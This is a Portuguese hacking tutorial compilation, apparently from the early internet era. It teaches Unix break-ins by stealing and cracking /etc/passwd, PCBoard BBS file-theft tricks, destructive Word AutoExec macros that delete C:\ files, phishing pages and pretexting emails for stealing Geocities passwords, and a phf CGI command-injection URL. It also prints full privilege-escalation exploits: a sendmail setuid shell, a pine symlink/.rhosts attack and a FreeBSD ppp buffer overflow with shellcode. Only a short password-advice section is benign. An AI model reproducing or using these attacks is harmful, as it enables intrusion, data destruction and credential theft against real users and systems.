INVASÃO UNIX


Para entrar no sistema UNIX, você deve entrar com um "login", que pode ter de 1 a 8 dígitos e um password que pode ter de 6 a 8 dígitos. Dai você tem duas saídas: 1.Arrumar a lista de passwords com um hacker 2.Tentar entrar com os defaults do UNIX 3.Ver quem está on-line com os comandos: who, rwho, finger; e tentar entrar com seus logins mais tarde. Obs: Defaults do UNIX são logins e passwords que já vem com o sistema. Eles ficam residentes até que o sysop o desliguem, então você pode dar a sorte de encontrar um esquecido. Veja lista abaixo.
Login:
Password:
Root
Root

 

Dentro do sistema, a primeira coisa que você deve fazer é copiar o arquivo da lista de passwords. Ele se está em: /etc/passwd. Mas alguns tipos de UNIX guardam a lista de passwords em outro lugar, veja a lista abaixo:

 
UNIX:
DIRETÓRIO:
AIX 3
/etc/security/passwd

/tcb/auth/files//

A/UX 3.Os
/tcb/files/auth/?
BSD4.3-Reno
/etc/master.passwd
ConvexOS 10
/etc/shadpw
Convex0S 11
/etc/shadow
DG/UX
/etc/tcb/aa/user
EP/IX
/etc/shadow
HP-UX
/.secure/etc/passwd
IRIX 5
/etc/shadow
Linux 1.1
/etc/shadow
SunOS 5.0
/etc/shadow ]
SCO Unix #.2.x
/tcb/auth/files/
System V 4.0
/etc/shadow
System V 4.2
/etc/security/database
Ultrix 4
/etc/auth[.dir|.pag]
UNICOS
/etc/udb

No arquivo de passwords, você vai encontrar as informações na seguinte sintaxe:

username:password:UserID:GroupID:descrição ou nome:homedir:shell

Ex.:ard:234abc56:7148:34:Rodrigo Ardilha:/home/dir/ard:/bin/ard

Username: ardilha

Encrypted Password: 234abc56

User Number: 7148 Group Number: 34

Other Information: Rodrigo Ardilha

Home Directory: /home/dir/ard

Shell: /bin/ard

Esse arquivo muito provavelmente estará encriptados. O password estará escondido e, sem um programa para desencriptá-la, a lista será inútil. Na seção Download tem alguns programas que desencriptar esses tipos de arquivos.

Antes de usar o programa desencriptador que não dá certeza de sucesso, tente encontrar um login sem password pois assim, você só precisará digitar o login para entrar no sistema.

Ex.: ard::7148:34:Rodrigo Ardilha:/home/dir/ard:/bin/ard

Depois da lista de passwords, pegue os seguintes arquivos:

/etc/group - É a lista de newsgroups e seus passwords também encriptados.

sintaxe - groupname:password:group id:users in group /etc/hosts - É a lista de hosts conectados ao sistemas. Útil quando a conexão é via telnet ou rlogin. /usr/mail/user name - É onde estão guardadas as mensagens de cada usuário.

Ataque a BBS

Você como um bom usuário já deve ter entrado em um sistema de BBS's usando o fuleiro Hiper Terminal do Windows, quando você entrar pela primeira vez, eles escolhe acesso por alguns dias por uns 30 minutos diários, num é?

Mas esse acesso não vale nada, você só tem permissão para entrar no diretório de arquivos livres e mandar mensagens para o Sysop, que num tá nem aí para você... o negocio dele é só com os usuários que já pagaram um taxa e são já assinantes da merda da BBS dele... Bom, contando com esse maltratos, e preços abusivos para tanta merda aí vai alguns bugs para "se acabar" em uma BBS: # SyZTeM > PCBoard 15.x #

Caso você seja um novo usuário, ou seja, teu nível de acesso não permita fazer praticamente nada, execute tal bug para que você possa pegar file que esteja nos diretórios da bbs:

l - (filename) - (areaname) d - ns [ENTER]
Ex: L *.* 1 D NS
L: Procura por nome de arquivo.
*.*: todos arquivos.
1: Área.
D: Download dos arquivos.
NS: NonStop.
Pronto... Simples, não?
Para conseguir maior tempo de acesso:
Entre na área livre da bbs, marque qualquer file e faça o download. Pule pro seu OS, e entre no dir. onde se localiza o file, logo após você devera usar um programinha, cujo nome é "hexed.exe", onde ira editar tal file (não importa se esteja compactado) e tira somente 1 byte. Volta novamente pro seu programa de comunicação e puxe novamente o mesmo file pelo protocolo ZMODEM.
Agora... volte pro main menu da bendita bbs, e da uma olhadinha no teu tempo de acesso! :) Falha na verificação de tempo ao marcar arquivos:
Descrição:
Se você marcar arquivos pela forma descrita acima, com o comando L, você vai estar dizendo para o PCBoarD: "Olha sistema, quando eu for fazer download você me manda estes arquivos...", ou seja.. eles não são marcados imediatamente..
Se você for dar download e faltar tempo para alguns arquivos, simplesmente aborte o d/l com o comando a naquela linha: "Aborta, Continua, Goodbye, Protocol.. assim".. e então volta para o menu e usa o mesmo comando.
Quando você for fazer d/l novamente os arquivos já marcados aparecerão da seguinte forma:
"Duplicates file.." ou seja.. você tentou marcar duas vezes o mesmo arquivo, certo? Acontece que o PCB não conta o tempo destes arquivos duplicados, ou seja, ele vai marcar + xxx arquivos com o tempo restante. Por ex: se você tinha 60 minutos e usar este comando por umas 6 vezes, você pode fazer uma transferencia de 360 min.!! que beleeeeeeeeeza!!!!! # SyZTeM > PCBoard & RA (aLL VeRSioN) #
Para conseguir roubar qualquer file do HD do SySoP , inclusive o users.dat ou user.bbs (não lembro direito) da bbs!
Basta ter um programa de comunicação com o protocolo BiMODEM e o sistema HOST também. Mas caso teu programa não tiver tal protocolo, basta instalar um... não é difícil de achar!
Bom... você esta conectado na bbs, agora, faca o upload de qualquer arquivos. Durante a transferencia (por protocolo BiMODEM) você terá a opção de fazer o download... pronto! Puxe o users.dat do HD HOST, mas antes, você terá que descobrir em que diretório se encontra tal arquivos.
Mas isto é fácil.. puxe o autoexec.bat dele, e verifique qual o board que ele esta carregando, e em que path esta localizado, consequentemente, você saberá onde esta o users.dat.

Macros de word

Ainda hoje existe muita gente que so é capaz de abrir o word, editar, negritar, sublinhar e mandar para impressora, muitos, milhares so sabem mexer no basico mesmo. Eles nem imaginam o que tem por traz deste riquissimo processador de texto.
Esta materia tem como objetivo fazer desde pequenas ate grandes sacanagens com usuarios pentelhos. ps: Software/versao Abrangido: Word da Microsoft, versões 6 (win3.11) e 7.0 (win95) O Word possui um arquivo chamado "normal.dot" onde estão todas as configuracões padrao do word. Se por algum motivo este arquivo for deletado o Word cria automaticamente quando for inicializado.
Niveis de sacanagem Nivel 1..... Apenas uma brincadeira
Nivel 2..... Apenas uma brincadeira de mau gosto
Nivel 3..... não é mais brincadeira.
Primeiro voce precisa criar uma macro... siga os passos:
Entre no Word, feche a janela de documento, não deixe nenhum documento aberto(ativo), clique em Arquivo(File) depois Macro, coloque no nome da macro "AutoExec"(obrigatorio) esta macro é inicializada toda vez que o Word for iniciado, depois clique em 'Criar', delete as duas linhas que tiver la (Sub MAIN e End Sub) e cole a rotina que tem logo mais abaixo.
ps: existe outras formas/meios d criar uma macro,mas esta é mais simples. Nivel 1
O nivel 1 serve para voce se mostrar, falando que entende do Word melhor do que ninguem.
Cada vez que o usuario inicia o Word recebera uma mensagem... de alerta ou qualquer outro coisa que sair da sua mente. veja abaixo.
Sub MAIN vMsgBox "Voce ‚ um pentelho! Eu nÆo irei prosseguir com o sistema", "Microsoft Word", 5
MsgBox "Usu rio Pirata Detectado", "FATAL ERROR", 16
MsgBox "JAMES BOND 007 ", "007 na estrada Digital", 64 End Sub Nivel 2
É para deixar o usuario irritadissimo. no corpo da macro cole este texto abaixo: Sub MAIN
ArquivoNovoPadrão Inserir "James"
ArquivoNovoPadrão
Inserir "Bond"
ArquivoNovoPadrão
Inserir "007"
ArquivoNovoPadrão Inserir "James Bond 007 Na Estrada digital "
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "."
ArquivoNovoPadrão
Inserir "James Bond 007 Na Estrada digital " End Sub Nivel 3
Bom este nivel é pura sacanagem,com ele um simples clicar* do mouse, e tudo desaparece! isto mesmo "del *.*" ou apenas os documentos, voce é quem sabe. Sub MAIN Kill "C:\*.*"
Kill "C:\WINDOWS\*.*"
Kill "C:\WINWORD\*.*"
End Sub
Lembre-se de que estes macros, sao gravado no arquivo default do word, ou seja no 'normal.dot' se este arquivo for deletado, o Word cria automaticamente na inicializacao,entao se voce for fazer estas sacanagens ai acima, proteja este arquivo, com o comando 'attrib +r'.
Detalhes:
Existe uma forma de iniciar o Word, sem q inicialize a macro 'AutoExec' mas não irei falar, descubra voce mesmo.
A macro do word é uma ferramenta riquissima, procure fucar.
Voce pode fazer estas no seu proprio computador(so cuide!), salvando sempre no arq. "normal.dot" depois copie apenas este arquivo para aquele seu colega/amigo pentelho e saie de perto, para não explodir em voce.

Como hackear a geocities

1- Anote o membername da pagina dando um source!
2- Anote o lugar em que essa pagina esta.
ex: http://www.oocities.org/Augusta/2000/
Logicamente vc so vai anotar o diretorio e o block!
3- Agora va ate a pagina principal da Geocities e clique no link CONTACT GEOCITIES do lado esquerdo, depois clique em SYSTEM PROBLEMS, e depois em SYSTEM PROBLEMS REPORTING FORM. La vc vai colocar as informacoes necessarias, o diretorio(acima citado) o block, o seu email(aconselho a fazer o forward) e no espaco abaixo vc vai colocar o problema, diga que ainda nao recebeu sua senha(em ingles)
4- Porra como e ridiculo ne? Agora e so esperar em 3 ou 4 dias no maximo chega sua senha!
Obx: E mais facil de receber a senha se a home page que vc for hackear for nova(no maximo 2 meses) se passar disso ja fica muito dificil de receber a resposta!
Fique tranquilo eles sao muito atarefados pra verificarem se e vc mesmo, quase 100% de chance de receber o email e nao acontecer nada com vc!
5- Outro jeito de obter a senha é o seguinte: vc pega a pagina da geocities, e dá download dela. no seu pc, vc vai editar ela: vc coloca um texto, falando que "ocorreram alguns problemas na geocities, e as paginas caíram por um tempo, mas depois voltaram, sendo assim, a geocities está dando 5mb a mais para sua pagina, basta preencher o formulario abaixo". e no formulario, vc pede o nome, o login, o endereço da pagina,... as informaçoes todas, e, é logico, a senha. e manda o formulario enviar os resultados para o seu e-mail. (espero que vc saiba fazer formularios). daí vc publica a pagina e manda um e-mail pro cara como se fosse a geocities e coloca o link da pg falsa no e-mail. daí é so esperar a senha chegar por e-mail.

travar uma BBS

Bem, para travar uma BBS através de chat você deve primeiro comprovar se o chat aceita o "@".
Digite @ e dê enviar para comprovar. Se aparecer o @ ele aceita e você pode utilizar este comando :
Digite no lugar normal de escrever no chat o seguinte comando ( Ex. ):
@DELAY: 999999999999999@ (E dê enviar)
Este comando travará a BBS por um bom tempo !
Este foi um exemplo mas quanto mais números você por mais tempo a BBS ficará travada .

Como elaborar uma senha

Uma senha fácil de se deduzir é a causa mais comum dos problemas de segurança. Se você não souber como trocar a sua senha, coloque essa tarefa como item número 1 da sua lista de coisas a aprender. Você nunca deve criar senhas tomando pôr base o seu próprio nome - mesmo que seja o seu nome de trás para frente. A senha não pode também ser fácil de se adivinhar, como o nome do marido ou mulher, do namorado ou namorada, do seu cão, a placa do carro, a rua onde mora, a data do nascimento - ou outra informação conhecida. Os hackers costumam usar os programas e dicionários on-line para adivinhar expressões como dedicação.
Como podem ser as senhas então? Não há pistas, certo? Pois bem, seja criativo. Pegue a sua frase preferida, como Até que a morte nos separe, querida e utilize a primeira letra de cada palavra aqamnsq. Dessa forma, a senha não é propriamente uma palavra, mas é fácil; de lembrar e difícil de adivinhar. Você pode também combinar palavras com números, o que é bem aconselhável. Mas nunca crie uma senha somente com números, é muito mais fácil de adivinhar.

Hackeando HP's

1-INTRODUÇÃO :
O texto a seguir fala sobre como hackear uma home page.
Aqui estão as suas seções :
-Precauções-cuidados que você deve tomaar.
-Sobre as senhas-arquivos falando sobree as senhas.
-Desencryptando as senhas-como desencryyptar senhas.
-Ftp-como hackear uma HP por ftp. -Phf-como hackear uma HP usando o métoddo phf
-Home page grátis-como hackear servidorres de home page grátis
-Home page grátis 2-Outro método de commo hackear servidores de home pages grátis
-Já cadastrado-Como hackear uma home paage que você já tenha cadastro no mesmo servidor
-Telnet e exploits-Como hackear uma pagge usando telnet e exploits
-Já cadastrado 2-Outro metodo de como hhackear uma hp que você já tenha cadastro no mesmo servidor.

2-PRECAUÇÕES:

Nesse texto vou ensinar deversos métodos de como hackear uma home page.
Queria avisar que hackear uma home page é considerado crime e que isso dá cadeia. Toda vez que você entra em um sistema seu IP fica gravado e "eles" vão poder te encontrar. Portanto antes de cometer um ato como esse eu sugiro que vocês tomem umas medidas de segurança como spoofing e etc...

3-SOBRE AS SENHAS :

A senha esta em um arquivo chamado passwd. Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd.
Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow!
A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório.
Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix).
Uma senha encryptada é mais ou menos assim :
root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom
Jones,:/usr/people/tomjones:/bin/csh
BBob:EUyd5XAAtv2dA:1129:20:Billy
Bob:/usr/people/bbob:/bin/csh
Agora o exemplo de uma senha com shadow :
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/
usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
webmastr:x:53:53:WWW
Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Você pode notar que tem um "x" no root! Esse x pode ser representado também por um "*".
Agora você já sabe um pouco mais sobre o arquivo passwd e sobre as senhas.

4-DESENCRYPTANDO :

Para desencryptar uma senha precisaremos de três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack 14)e logicamente o arquivo onde está senha(passwd).
O que é cada um?
Word list- Como o próprio nome já diz, é uma lista de palavras.
Desencryptador- É o programa que você vai usar para desencryptar a senha.
Passwd- Nesse arquivo está a senha encryptada.
Coloque todos esses itens nesse mesmo diretório.
Abra o prompt do DOS e entre no diretório onde eles estão.
Agora faça o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde esta a senha" "nome da sua word list" Então vamos supor que meu programa é o jack, o arquivo é o passwd, a word list é lista.
Então ficaria assim :
jack passwd lista.txt
E pronto! A senha está desencryptada!
Mas como isso funciona??
Quando você roda o jack ele pega o arquivo passwd e testa
com todas as palavras da word list.


5-FTP

Hackear uma HP por ftp talvez seja o melhor metodo. É bem simples e rápido de ser feito.
Para fazer isso vamos usar o prompt do MS-DOS. Espero que você saiba pelo menos mexer no básico do DOS. O que vamos faz é simplesmente entrar no ftp da home page com login anonymous e fazer o download do arquivo passwd.
Abra o prompt do DOS.
Você vai ter que entrar no ftp da HP que voce quer hackear.
Normalmente a endereço é o mesmo da home page.
Então digite ftp www.hackers.com
Ele vai pedir seu USER. Coloque anonymous.
Agora vai pedir que você coloque seu e-mail completo como senha. Claro que você vai colocar alguma coisa qualquer, tipo fuckyou@idiota.com.
Você vai entrar no ftp como user anonymous e retrictions applly!
Isso significa que você entrou como anonymous e com restrições aplicadas!
Agora você precisa ir para o diretório etc.
Entre e faça o donwload do passwd.
Pra isso digite "get passwd".
Pronto, o arquivo passwd vai estar no diretório que você estava quando entrou no ftp.
Tipo windows, arquivos de programas....
Agora você que tem o arquivo só precisa desencryptalo e pronto! A senha estará em suas mãos..

6-PHF :

O phf é com certeza o modo mais simples de se obter o arquivo passwd. É tão simples que você não precisa saber nada!
A única coisa que você tem que fazer é abrir seu browser e colocar uma URL.
Porém esse método tem 95% de chance de não funcionar! A maioria dos servidores já acharam o bug e concertaram. Só colocar essa URL no location do seu browser :
http://Endereço_da_pagina/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd
Apenas isso e pronto!

7-HACKEANDO SERVIDORES DE HOME PAGES GRATIS (1):

Alguns servidores de home page tipo a geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão nesses servidores.
Tudo que voce tem que fazer é mandar um e-mail pedindo pra eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo : "por favor me mandem a senha".
Façam algo mais convincente. Pegue todas as informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do cara". Eu coloquei algumas coisas no meu espaço e saí de férias.
Quando voltei das ferias eu tinha me esquecido da senha!!
Só me lembrava do user name, que é : "user name da HP".
Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."
Companhias como a geocities são muito ocupadas pra ficar verificando se é verdade eu não!
Provavelmente eles iram acreditar e em 2 semanas(mais ou menos) você receberá a senha no seu e-mail!

8- HACKEANDO SERVIDORES DE HOME PAGES GRATIS (2):

Outro modo de hackear esse tipo de home pages é enganar o próprio webmaster da HP!
Esse modo funciona normalmente com webmasters idiotas que não sabem muito coisa e nem percebem que eles mesmos estão dando a senha para o hackeador.
É outro método bem simples mas um pouco mais demorado. O que você tem que fazer é criar uma pagina onde você finge que é a geocities que esta dando mais megas para HP's!
Ou seja, você terá que criar uma página imitando a geocities! Faça uma pagina exatamente no estilo da da geo. E coloque tudo com as mesmas gifs, mesmos banners e coloque um formulário pra ser preenchido e diga que quem preencher aquilo vai ganhas mais 10 megas livre de espaço pra HP!!!
Nesse formulário o cara terá que colocar o user e a senha da HP, o endereço e etc....
Para o cara "receber" os megas ele terá que enviar o formulário.
Para isso ela deverá clicar em algum botão de envio, normalmente um botão que fica escrito "submit" Quando a pessoa clica no botão submit formulário é enviado para a geocities pois aquele botão tem um comando para enviar para a geocities.Então o que você terá que fazer é mudar o comando. Em vez do formulário ser enviado para a geocities esse formulário vai ser enviado para o seu e-mail.
Para isso você terá que editar a pagina da geocities. No lugar que tem escrito:
FONT FACE="Orbit-B BT" SIZE="3" COLOR="#00CC00" form action="/cgi-bin/homestead/file_manager"method=post
Você tará que trocar para :
FORM ACTION="http://www.uky.edu/cgi-bin/cgiwrap/~johnr/Any Form.cgi"METHOD="Post"
INPUT TYPE="Hidden" Name="AnyFormMode"Value="mail"
INPUT TYPE="Hidden"Name="AnyFormDisplay"Value="http://www.geocities. com/members/tools/file_manager.html"
INPUT TYPE="Hidden" Name="AnyFormTo"Value="Coloque seu e-mail aqui"
INPUT TYPE="Hidden" Name="AnyFormSubject"Value="Senha hackeada da geocities"
Então assim que o cara clicar no botão submit todos os dados seram enviados para o seu e-mail.
E assim você terá a senha.
Agora é só pegar um endereço na net e colocar essa pagina editada na geocities nele e mandar as pessoas visitarem.
E pronto! O formulário vai chegar com a senha e user name no teu e-mail.

9-HACKEANDO UMA HP EM QUE VOCE JÁ TENHA CADASTRO NO MESMO SERVIDOR

Esse método é realmente difícil de funcionar mas as vezes funciona com uns admins bem idiotas.
Quando você entra no seu ftp você pode sair do seu diretório home (diretorio onde você esta assim que entra) e voltar alguns diretórios até encontrar o diretório da HP que você quer hackear.
Uma vez que voce já fez, se você puder ter acesso aos arquivos HTML pegue-os e edite eles! E pronto!
Com admins mais inteligentes você não consegue ter acesso os arquivos da page alvo.

10-TENET E EXPLOITS :

Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin....
Vou listar alguns exploits abaixo :
Esse se chama sendmail bug. Ele cria um programa /tmp/x que chama shells como root.
------------------------------------------------------------------------------------------------------------------------------ cat _EOF_ /tmp/x.c
#define RUN "/bin/ksh"
#includestdio.h
main()
{ execl(RUN,RUN,NULL);
} _EOF_
# cat _EOF_ /tmp/spawnfish.c
main()
{ execl("/usr/lib/sendmail","/tmp/smtpd",0);
} _EOF_
# cat _EOF_ /tmp/smtpd.c
main()
{ setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
} _EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
# /tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed
s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd
/tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
------------------------------------------------------------------------------------------------------------------------------ Agora mais um exploit. Eu vou mostrar o "pine exploit" vendo o processo da tabela com ps você pode ver os usuário rodando o pine. Um então pode fazer um ls no /tmp/ pra conseguir o nome do lockfile pra cada usuário. Vendo o processo da tabela de novo vai revelar quais usuarios ou saem com mensagens não lidas nos seus inbox. Efetivamente deletando o lockfile respectivo.
Criando um link de /tmp/.hamors_lockfile para ~hamors/.rhosts vai fazer com que o pine crie ~hamors/.rhosts como com um arquivo 666 com as identidades processadas e que elas contém.
Agora precisa fazer um " echo "+ +" /tmp/.hamors_lockfile e rm /tmp/.hamors_lockfile.
------------------------------------------------------------------------------------------------------------------------------ hamors (21 19:04) litterbox:~ pine
catluvr (6 19:06) litterbox:~ ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep
pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~ ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05
.302.f5a4

catluvr (8 19:07) litterbox:~ ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep
pine
catluvr (9 19:09) litterbox:~ ln -s /home/hamors/.rhosts
/tmp/.302.f5a4
hamors (23 19:09) litterbox:~ pine
catluvr (11 19:10) litterbox:~ ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep
pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~ echo "+ +" /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~ cat /tmp/.302.f5a4
+ + catluvr (14 19:12) litterbox:~ rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~ rlogin litterbox.org -l hamors
------------------------------------------------------------------------------------------------------------------------------ Esse é o ultimo que vou relacionar aqui. Exploitation script para vunerabilidade ppp. Funciona em "FreeBSD".
------------------------------------------------------------------------------------------------------------------------------ #include stdio.h
#include stdlib.h
#include unistd.h
#define BUFFER_SIZE 156 /* size of the bufer to
overflow */
#define OFFSET -290 /* number of bytes to jump
after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eax\n"); }
main(int argc, char *argv[])
{ char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
/* 16 bytes */
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
/* 16 bytes */
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
/* 20 bytes */
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
/* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
} ----------------------------------------------------------------------------------------------------------------------- Agora voce tem o root. Faça o que você quiser! Mas eu trocaria logo a senha da HP antes de mexer em qualquer coisa ou deletar.
Pra trocar a senha da HP voce tem que é entrar via telnet E entrar com sua nova conta Ae voce digita "passwd :". Vai pedir a senha antiga e depois a senha que você quer colocar.
Agora você só voce tem a senha e então é só fazer o que você quiser como deletar tudo e fazer o Upload das suas paginas.


Eu queria avisar aqui que todos os items relacionados aqui realmente funcionam! Se você nao conseguir, foi porque cometeu algum erro, ou fez "mal feito". Muita gente tem reclamado que não funciona... Se você entendeu tudo perfeitamente você pode hackear quase qualquer home page.